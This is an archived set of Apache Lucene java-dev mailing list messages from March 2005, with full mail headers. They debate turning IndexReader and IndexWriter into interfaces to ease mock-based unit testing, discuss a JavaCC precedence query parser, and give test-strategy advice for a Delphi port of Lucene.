(HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 16 Mar 2005 21:41:48 -0000 Received: (qmail 84289 invoked by uid 500); 16 Mar 2005 21:41:48 -0000 Delivered-To: [email protected] Received: (qmail 84041 invoked by uid 500); 16 Mar 2005 21:41:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84024 invoked by uid 99); 16 Mar 2005 21:41:46 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=SPF_HELO_PASS,WEIRD_PORT X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from smtpauth03.mail.atl.earthlink.net (HELO smtpauth03.mail.atl.earthlink.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 16 Mar 2005 13:41:44 -0800 Received: from [161.129.204.104] (helo=ENGELSSERVER) by smtpauth03.mail.atl.earthlink.net with asmtp (Exim 4.34) id 1DBgGs-0006iz-RJ for [email protected]; Wed, 16 Mar 2005 16:41:42 -0500 Reply-To: <[email protected]> From: "Robert Engels" <[email protected]> To: <[email protected]> Subject: RE: Interfaces Date: Wed, 16 Mar 2005 15:41:42 -0600 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 Importance: Normal In-Reply-To: <[email protected]> X-ELNK-Trace: 33cbdd8ed9881ca8776432462e451d7bd15d05d9470ff71028cb5a9cbc190935f3f0a35df1d089a4350badd9bab72f9c350badd9bab72f9c350badd9bab72f9c X-Originating-IP: 161.129.204.104 X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I've been pushing for making IndexReader and IndexWriter interfaces for a long time (and changing lucene core to use them), but there seems a reluctance to do so (although I am not sure why). The current factory methods could be easily moved to a IndexReaderWriter factory class. Probably a top-level interface IndexReaderWriter with methods like isWritable() for "read only" indices, and methods getReader(), getWriter(). With a decent IDE a single developer could make all of the changes in about a half a day, but it would need support of the "team", since the patch would be huge. Robert Engels -----Original Message----- From: Maik Schreiber [mailto:[email protected]] Sent: Wednesday, March 16, 2005 3:33 PM To: [email protected] Subject: Interfaces Hi, I know the issue of using interfaces in Lucene has been discussed a few times before. I'd like to bring that to the table once again, though, because I think all those discussions were missing an important point: unit testing. Without coding to interfaces it gets quite complicated to test for calls being made to an IndexWriter, for example. Of course it's possible to subclass IndexWriter and intercept all relevant calls, it still remains being a PITA. Consider the following JUnit test method for testing a hypothetical Foo.foo(IndexWriter, Document) method that does nothing more than IndexWriter.addDocument(doc): public void testFoo() throws IOException { final List addedDocuments = new ArrayList(); Directory dir = new RAMDirectory(); Analyzer analyzer = new StandardAnalyzer(); IndexWriter writer = new IndexWriter(dir, analyzer, true) { public void addDocument(Document doc) throws IOException { super.addDocument(doc); addedDocuments.add(doc); } }; Document doc = new Document(); new Foo().foo(writer, doc); assertEquals(1, addedDocuments.size()); assertSame(doc, addedDocuments.get(0)); } As you can see, you have to go at relatively great lengths just to test for a single method call. You need to create a Directory for the IndexWriter, and the IndexWriter instance itself. The IndexWriter really adds the document to the directory. In addition to that, we're taking notes of the added documents, so we can assert those later on. This complexity even grows when doing other this: Say you want to test a call to IndexReader. The problem is that IndexReader.open() needs to have a valid index lying around. So to set up the environment for that requirement you first need to create a fake index in a RAMDirectory using an IndexWriter, then use that index to test IndexReader calls. Now this is the same test method as above, but this time using EasyMock and an interface IIndexWriter (which IndexWriter hypothetically implements): public void testFoo() throws IOException { MockControl writerControl = MockControl.createControl(IIndexWriter.class); IIndexWriter writer = (IIndexWriter) writerControl.getMock(); Document doc = new Document(); writer.addDocument(doc); writerControl.setVoidCallable(); writerControl.replay(); new Foo().foo(writer, doc); writerControl.verify(); } This time, it's all straightforward: No Directory created, no IndexWriter created, no document added. We just tell the mocked-up IndexWriter what method calls to expect and what to return (or do nothing, or throw an exception). Also there's no taking notes of added documents because EasyMock does that already. The net benefit is that there are no useless objects created. Those could even harm the test results in the worst case. Also the test should run faster now, which can really add up when you have hundreds or thousands of tests. -- Maik Schreiber * http://www.blizzy.de GPG public key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1F11D713 Key fingerprint: CF19 AFCE 6E3D 5443 9599 18B5 5640 1F11 D713 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 07:40:41 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17446 invoked from network); 17 Mar 2005 07:40:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 07:40:41 -0000 Received: (qmail 85656 invoked by uid 500); 17 Mar 2005 07:40:38 -0000 Delivered-To: [email protected] Received: (qmail 85627 invoked by uid 500); 17 Mar 2005 07:40:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 85614 invoked by uid 99); 17 Mar 2005 07:40:37 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from web54301.mail.yahoo.com (HELO web54301.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Wed, 16 Mar 2005 23:40:36 -0800 Received: (qmail 1705 invoked by uid 60001); 17 Mar 2005 07:40:34 -0000 Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; b=er0M/RuwqrcSzL2E88UzkkvEQNFakn1bOg4rD88zzQsV1U4NnNGlj7HnqcH9CaDCZWBdpfnMbBAOm/oUVnIrXaM0q55PCR613SIx4XyBj7kFUVlHkG52gu6bpUO8jOO+pSohwjjS0HAnaK1FcZEw7UlR85EodHtURsIdhZ5GsCU= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web54301.mail.yahoo.com via HTTP; Wed, 16 Mar 2005 23:40:34 PST Date: Wed, 16 Mar 2005 23:40:34 -0800 (PST) From: Konstantin Priblouda <[email protected]> Subject: RE: Interfaces To: [email protected], [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N --- Robert Engels <[email protected]> wrote: > I've been pushing for making IndexReader and > IndexWriter interfaces for a > long time (and changing lucene core to use them), > but there seems a > reluctance to do so (although I am not sure why). > The current factory > methods could be easily moved to a IndexReaderWriter > factory class. Probably > a top-level interface IndexReaderWriter with methods > like isWritable() for > "read only" indices, and methods getReader(), > getWriter(). Hi guys, what about making lucene a bit more IoC Friendly? ( I speak of providing objects that can be created wia constructor, and not by factory ) I'm tired of writing adapter classes... regards, ----[ Konstantin Pribluda ( ko5tik ) ]---------------- Plugins for xdoclet-2 are released. check it out at: http://www.sourceforge.net/projects/xdoclet-plugins/ ----[ http://www.pribluda.de ]------------------------ __________________________________ Do you Yahoo!? Yahoo! Small Business - Try our new resources site! http://smallbusiness.yahoo.com/resources/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 11:31:02 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74117 invoked from network); 17 Mar 2005 11:31:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 11:31:02 -0000 Received: (qmail 54636 invoked by uid 500); 17 Mar 2005 11:30:59 -0000 Delivered-To: [email protected] Received: (qmail 54606 invoked by uid 500); 17 Mar 2005 11:30:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54593 invoked by uid 99); 17 Mar 2005 11:30:59 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 03:30:58 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id E532313E200A; Thu, 17 Mar 2005 06:30:55 -0500 (EST) Received: from [161.129.204.104] (va-chrvlle-cad1-bdgrp1-4b-b-169.chvlva.adelphia.net [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 4A76413E2008 for <[email protected]>; Thu, 17 Mar 2005 06:30:42 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: Interfaces Date: Thu, 17 Mar 2005 06:30:46 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-1.3 required=5.0 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I think, though I'm not speaking for anyone here but myself, that the Lucene team is open to API improvements that _do not adversely affect performance_ and that have _a real benefit_. While I'm as IoC and design pattern savvy as the next developer, I'm also highly pragmatic. I've not been convinced by any of the examples thus far. If a unit test needs to detect if a document has been added, you can check the size of the index before and after for example, rather than doing some mock trickery to hook the addDocument call. Or you could use AspectJ to do this if you really wanted to get fancy. The unit test example shown is really a unit test appropriate to Lucene itself, and not to a project using Lucene, it seems. Pragmatically, have you ever had addDocument fail? If not, then what peace of mind are you getting from such a test? Ultimately, though, the decision to refactor the codebase to use interfaces more pervasively lies with Doug. Erik On Mar 17, 2005, at 2:40 AM, Konstantin Priblouda wrote: > > --- Robert Engels <[email protected]> wrote: > >> I've been pushing for making IndexReader and >> IndexWriter interfaces for a >> long time (and changing lucene core to use them), >> but there seems a >> reluctance to do so (although I am not sure why). >> The current factory >> methods could be easily moved to a IndexReaderWriter >> factory class. Probably >> a top-level interface IndexReaderWriter with methods >> like isWritable() for >> "read only" indices, and methods getReader(), >> getWriter(). > > > Hi guys, > what about making lucene a bit more IoC Friendly? > ( I speak of providing objects that can be created wia > constructor, and not by factory ) > > I'm tired of writing adapter classes... > > regards, > > ----[ Konstantin Pribluda ( ko5tik ) ]---------------- > Plugins for xdoclet-2 are released. check it out at: > http://www.sourceforge.net/projects/xdoclet-plugins/ > ----[ http://www.pribluda.de ]------------------------ > > > > __________________________________ > Do you Yahoo!? > Yahoo! Small Business - Try our new resources site! > http://smallbusiness.yahoo.com/resources/ > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 14:15:12 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52149 invoked from network); 17 Mar 2005 14:15:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 14:15:12 -0000 Received: (qmail 51861 invoked by uid 500); 17 Mar 2005 14:15:10 -0000 Delivered-To: [email protected] Received: (qmail 51835 invoked by uid 500); 17 Mar 2005 14:15:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51821 invoked by uid 99); 17 Mar 2005 14:15:09 -0000 X-ASF-Spam-Status: No, hits=0.9 required=10.0 tests=FORGED_RCVD_HELO,FROM_HAS_MIXED_NUMS,SPF_HELO_PASS,SPF_PASS,WEIRD_PORT X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from iceman.iq-computing.de (HELO iceman.iq-computing.de) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 06:15:08 -0800 Received: (qmail 27718 invoked from network); 17 Mar 2005 15:15:05 +0100 Received: from c142113.adsl.hansenet.de (HELO wolverine.hh.iq-computing.de) ([email protected]) by iceman.iq-computing.de with AES256-SHA encrypted SMTP; 17 Mar 2005 15:15:05 +0100 Received: (qmail 15602 invoked from network); 17 Mar 2005 15:15:32 +0100 Received: from localhost (HELO ?161.129.204.104?) (161.129.204.104) by localhost with SMTP; 17 Mar 2005 15:15:32 +0100 Message-ID: <[email protected]> Date: Thu, 17 Mar 2005 15:15:32 +0100 From: Maik Schreiber <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (X11/20041227) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Interfaces References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 161.129.204.104 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=US-ASCII; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N > Pragmatically, > have you ever had addDocument fail? If not, then what peace of mind are > you getting from such a test? The test I've shown is not supposed to test if addDocument() fails or not, but to test if addDocument() is [email protected]. The tested method was Foo.foo(), which could be doing more things that could possibly fail before addDocument() is [email protected]. -- Maik Schreiber * http://www.blizzy.de GPG public key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1F11D713 Key fingerprint: CF19 AFCE 6E3D 5443 9599 18B5 5640 1F11 D713 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 14:15:37 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54514 invoked from network); 17 Mar 2005 14:15:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 14:15:35 -0000 Received: (qmail 52544 invoked by uid 500); 17 Mar 2005 14:15:32 -0000 Delivered-To: [email protected] Received: (qmail 52517 invoked by uid 500); 17 Mar 2005 14:15:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 52500 invoked by uid 99); 17 Mar 2005 14:15:32 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 06:15:31 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id E359A13E200A; Thu, 17 Mar 2005 09:15:27 -0500 (EST) Received: from [161.129.204.104] (d-128-167-124.bootp.Virginia.EDU [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 9970813E2008 for <[email protected]>; Thu, 17 Mar 2005 09:15:09 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: Precedence parser: NOT/AND, disableCoord Date: Thu, 17 Mar 2005 09:15:17 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-3.2 required=5.0 tests=AWL,BAYES_00 autolearn=ham version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Mar 15, 2005, at 3:57 PM, Paul Elschot wrote: > On Tuesday 15 March 2005 01:55, Erik Hatcher wrote: >> I'd welcome others to give it a try, though. I'm still learning how >> to >> accomplish things with JavaCC. > > The basic rule is the deeper the nesting of the grammar construct, > the higher the parsing precedence of the corresponding operator. Right. I got that much :) I did implement this locally and other tests broke (I sent the details to the list, but have since reverted my changes). >> I've struggled (and still struggling) with this same thing myself. >> AND/OR are problematic because of the nature of boolean clauses, which >> individually have their own required/prohibited flags, not in >> _conjunction_ with another clause. > > I'd recommend to use getOrQuery() and getAndQuery() methods to > map to a boolean query via the clauses, and to implement corresponding > grammar constructs that just collect the clauses. Top level for OR, > next level for AND, next level for NOT. > Mixing - and NOT is no problem, but + and AND is not nice. > Allowing the mix should probably throw a ParseException in > some unexpected corners. It might for example be possible to > disallow + on the level of AND. Good ideas. I'd love to fiddle with this, but realistically I won't for a while. I'd be happy to apply patches and try out changes. > How much compatibility with the existing parser is needed, > in particular with the coordination factor? That's a great question. For it to replace QueryParser and fix the weirdnesses with it, the syntax that is currently accepted should be supported and generate equivalent queries when possible and fixed queries where QueryParser was wrong/awkward. >>> However, from what I see now in the precedence parser, >>> giving up might have been premature. It seems to be possible >>> to make the mix after all. >> >> I believe its possible, but I won't be spending time on it in the next >> few weeks at least - anyone interested in the next generation query >> parser is encouraged to pick up the torch. > > I suppose another goal is to get the span queries in the parser. > Once the boolean OR/AND precedence works, it is also possible > to add operators with even higher precedence for the span queries. > Would you, or someone else, have any ideas on what the syntax for these > should look like? How much of the span functionality should be made > available via the query language? Support for SpanQuery's will be added in my custom query parser (proprietary under contract). The syntax I have to use is not something that is generalizable anyway, but I'm sure my learning of JavaCC will help us add this stuff eventually (if no one beats me to it). I think it'd be cool to at least have support for ordered sloppy phrase queries. Erik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 15:06:00 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99672 invoked from network); 17 Mar 2005 15:06:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 15:06:00 -0000 Received: (qmail 49674 invoked by uid 500); 17 Mar 2005 15:05:58 -0000 Delivered-To: [email protected] Received: (qmail 49646 invoked by uid 500); 17 Mar 2005 15:05:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49632 invoked by uid 500); 17 Mar 2005 15:05:57 -0000 Delivered-To: [email protected] Received: (qmail 49626 invoked by uid 99); 17 Mar 2005 15:05:57 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 07:05:56 -0800 Received: by rproxy.gmail.com with SMTP id f1so6757rne for <[email protected]>; Thu, 17 Mar 2005 07:05:51 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:references; b=a19XclY8lminfjW9fkq3Y06VYzMa1K9tvXbpjJp7Dvs2Mh7MPRmZnksxrfAH1dRYOzBcN/Jvfd7d3zxAFaBwiDSbzxEj3/iiryGfvznCn2vXs49tSmFlpYTThSnedzeChJXvNvoPG66IY4+7VNsyGZM6Xgom4GTc8r0bkI3CL5o= Received: by 161.129.204.104 with SMTP id 48mr1547548rnj; Thu, 17 Mar 2005 07:05:51 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 17 Mar 2005 07:05:50 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 17 Mar 2005 10:05:50 -0500 From: "Mario Alejandro M." <[email protected]> Reply-To: "Mario Alejandro M." <[email protected]> To: Lucene Developers List <[email protected]> Subject: Fwd: Recomended strategy for perform test cases for a new port In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I don't know why, but this message not appear before in the list, so I resend it... ---------- Forwarded message ---------- From: Mario Alejandro M. <[email protected]> Date: Tue, 15 Mar 2005 16:28:01 -0500 Subject: Recomended strategy for perform test cases for a new port To: Lucene Developers List <[email protected]> I finish the main (and boring!) part of port Lucene to Delphi (http://mutis.sourceforge.net/). So, I build some test cases and rigth now I pass test cases for: - BitVector - Field - DateField - Document - Number - PriorityQueue - StringHelper - Token - Analyzers (Simple,Null,Stop,Perfield) I want to know, from your experience, how go from here? I have a "compile" version but really not work. What classes/branch must pass/work rigth before the others? What path follow, how be more productive? I want to know what is the basic strategy to build the testcases (ie: Test first this, then move to that, etc...). My first inclination is get a chart of the code in UML and go for each branch. However, because some clases are interacting to others, this can be very hard to do. I prefer a strategy where I can go for the basic stuff and leave complex classes for later, so i can reach beta more quickly. In what point i can get a "working" version, ie: a version where the most basic functionality work but maybe advanced classes (like queryparser) is not. This is the CVS location, if that is necesary for something... http://cvs.sourceforge.net/viewcvs.py/mutis/Mutis/ -- Mario Alejandro Montoya MCP www.solucionesvulcano.com !Obtenga su sitio Web din=E1mico! MUTIS http://mutis.sourceforge.net/ --=20 Mario Alejandro Montoya MCP www.solucionesvulcano.com !Obtenga su sitio Web din=E1mico! --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 15:11:57 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2928 invoked from network); 17 Mar 2005 15:11:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 15:11:57 -0000 Received: (qmail 68174 invoked by uid 500); 17 Mar 2005 15:11:47 -0000 Delivered-To: [email protected] Received: (qmail 68128 invoked by uid 500); 17 Mar 2005 15:11:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68103 invoked by uid 99); 17 Mar 2005 15:11:47 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy includes SPF [email protected]) Received: from relay00.pair.com (HELO relay.pair.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Thu, 17 Mar 2005 07:11:45 -0800 Received: (qmail 27522 invoked from network); 17 Mar 2005 15:11:43 -0000 Received: from unknown (HELO ?161.129.204.104?) (unknown) by unknown with SMTP; 17 Mar 2005 15:11:43 -0000 X-pair-Authenticated: 161.129.204.104 Message-ID: <[email protected]> Date: Thu, 17 Mar 2005 10:11:43 -0500 From: Garrett Rooney <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Fwd: Recomended strategy for perform test cases for a new port References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N > I finish the main (and boring!) part of port Lucene to Delphi > (http://mutis.sourceforge.net/). > > So, I build some test cases and rigth now I pass test cases for: > > - BitVector > - Field > - DateField > - Document > - Number > - PriorityQueue > - StringHelper > - Token > - Analyzers (Simple,Null,Stop,Perfield) > > I want to know, from your experience, how go from here? I have a > "compile" version but really not work. > > What classes/branch must pass/work rigth before the others? What path > follow, how be more productive? > > I want to know what is the basic strategy to build the testcases (ie: > Test first this, then move to that, etc...). My first inclination is > get a chart of the code in UML and go for each branch. However, > because some clases are interacting to others, this can be very hard > to do. I prefer a strategy where I can go for the basic stuff and > leave complex classes for later, so i can reach beta more quickly. My experience is probably a bit different, since Lucene4C isn't just recreating the various classes in the Java version, but what I've done is started with the lowest level APIs for reading files from disk, tested them, then built on top of them code for reading Lucene's specific file formats, tested them, then built the code for using that to run rudimentary searches, and tested that. Honestly, just going through and making a direct port of all the classes seems counterproductive. Now you're at the point where you've got all this code, and have no idea what parts of it work and what don't. I'd suggest finding the lowest level bits and pieces and building your tests there, working your way up. -garrett --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 15:22:13 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10156 invoked from network); 17 Mar 2005 15:22:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 15:22:12 -0000 Received: (qmail 93455 invoked by uid 500); 17 Mar 2005 15:22:09 -0000 Delivered-To: [email protected] Received: (qmail 93429 invoked by uid 500); 17 Mar 2005 15:22:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93416 invoked by uid 99); 17 Mar 2005 15:22:09 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 17 Mar 2005 07:22:07 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id B9B0613E2122; Thu, 17 Mar 2005 10:22:03 -0500 (EST) Received: from [161.129.204.104] (d-128-167-124.bootp.Virginia.EDU [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 48A7113E200A for <[email protected]>; Thu, 17 Mar 2005 10:21:34 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: Interfaces Date: Thu, 17 Mar 2005 10:21:32 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-3.2 required=5.0 tests=AWL,BAYES_00 autolearn=ham version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Mar 17, 2005, at 9:15 AM, Maik Schreiber wrote: >> Pragmatically, have you ever had addDocument fail? If not, then what >> peace of mind are you getting from such a test? > > The test I've shown is not supposed to test if addDocument() fails or > not, but to test if addDocument() is [email protected]. The tested method > was Foo.foo(), which could be doing more things that could possibly > fail before addDocument() is [email protected]. Point taken. Ease of unit testing is a reasonable argument for refactoring Lucene's API to be more interface-based - agreed. However, the primary focus of Lucene is and always will be performance. It would be important to demonstrate that resource utilization and performance are not adversely affected by such changes. Again, Doug needs to be the one to approve such a refactoring. Erik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 17 15:34:45 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18380 invoked from network); 17 Mar 2005 15:34:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 17 Mar 2005 15:34:44 -0000 Received: (qmail 28769 invoked by uid 500); 17 Mar 2005 15:34:32 -0000 Delivered-To: [email protected] Received: (qmail 28699 invoked by uid 500); 17 Mar 2005 15:34:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28655 invoked by uid 99); 17 Mar 2005 15:34:32 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= 